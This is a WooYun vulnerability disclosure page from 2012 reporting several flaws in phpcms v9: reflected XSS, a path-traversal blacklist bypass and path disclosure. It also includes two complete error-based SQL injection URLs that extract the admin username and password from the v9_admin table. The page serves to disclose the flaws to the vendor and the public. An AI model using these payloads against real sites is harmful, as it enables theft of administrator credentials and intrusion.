当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-09463

漏洞标题:phpcms v9 Multiple Vulnerabilities

相关厂商:盛大网络

漏洞作者: Zvall

提交时间:2012-07-11 09:41

修复时间:2012-07-16 09:42

公开时间:2012-07-16 09:42

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-07-11: 细节已通知厂商并且等待厂商处理中
2012-07-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

hpcmsV9最新版SQL注射+XSS

详细说明:

XSS 

public function public_get_suggest_keyword() {
		$url = $_GET['url'].'&q='.$_GET['q']; 
		echo $url;
		
		$res = @file_get_contents($url);
		if(CHARSET != 'gbk') {
			$res = iconv('gbk', CHARSET, $res);
		}
		echo $res;
	}


利用方法:
http://localhost/phpcms/index.php?m=search&a=public_get_suggest_keyword&url=http://localhost/&q=1
新建一个名为&q=1的文件 写入 <script>alert(/Zvall/)</script>
黑名单过滤:这里只说过滤方式. 这里并没有权限访问

if(!$this->admin_username) return false;
		if($_GET['args']) extract(getswfinit($_GET['args']));
		$dir = isset($_GET['dir']) && trim($_GET['dir']) ? str_replace(array('..\\', '../', './', '.\\','..'), '', trim($_GET['dir'])) : '';
		$filepath = $this->upload_path.$dir;
		$list = glob($filepath.'/'.'*');
		if(!empty($list)) rsort($list);
		$local = str_replace(array(PC_PATH, PHPCMS_PATH ,DIRECTORY_SEPARATOR.DIRECTORY_SEPARATOR), array('','',DIRECTORY_SEPARATOR), $filepath);
		$url = ($dir == '.' || $dir=='') ? $this->upload_url : $this->upload_url.str_replace('.', '', $dir).'/';
		$show_header = true;
		include $this->admin_tpl('album_dir');


http://localhost/phpcms/index.php?m=attachment&a=album_dir&dir=.\.\ 用黑名单过滤始终是不可取的
路径泄露

if (empty($filename)) $filename = ROUTE_C;  
		if (empty($m)) $m = ROUTE_M; 
		$filepath = PC_PATH.'modules'.DIRECTORY_SEPARATOR.$m.DIRECTORY_SEPARATOR.$filename.'.php';
		if (file_exists($filepath)) {
			$classname = $filename;
			include $filepath;
			if ($mypath = pc_base::my_path($filepath)) {
				$classname = 'MY_'.$filename;
				include $mypath;
			}
			return new $classname;


没进行容错处理提交:
http://v9.demo.phpcms.cn/index.php?m=../model&c=member_group_model.class
由于member_group_model.class 类不存在 会报错
Fatal error: Class 'member_group_model.class' not found in /workspace/wwwroot/v9.demo.phpcms.cn/phpcms/libs/classes/application.class.php on
http://v9.demo.phpcms.cn/index.php?m=../../
Fatal error: Cannot redeclare timeinterval() (previously declared in /workspace/wwwroot/v9.demo.phpcms.cn/phpcms/libs/functions/autoload/info.func.php:15) in /workspace/wwwroot/v9.demo.phpcms.cn/phpcms/libs/functions/autoload/info.func.php on line 27

漏洞证明:

XSS:


SQL注入:


http://localhost/phpcms/index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.username+as+char))),0x27,0x7e)+from+`phpcmsv9`.v9_admin+Order+by+userid+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+'1'%3D'1


http://localhost/phpcms/index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.password+as+char))),0x27,0x7e)+from+`phpcmsv9`.v9_admin+Order+by+userid+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+'1'%3D'1


修复方案:

过滤啊啊啊啊!

版权声明:转载请注明来源 Zvall@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-07-16 09:42

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无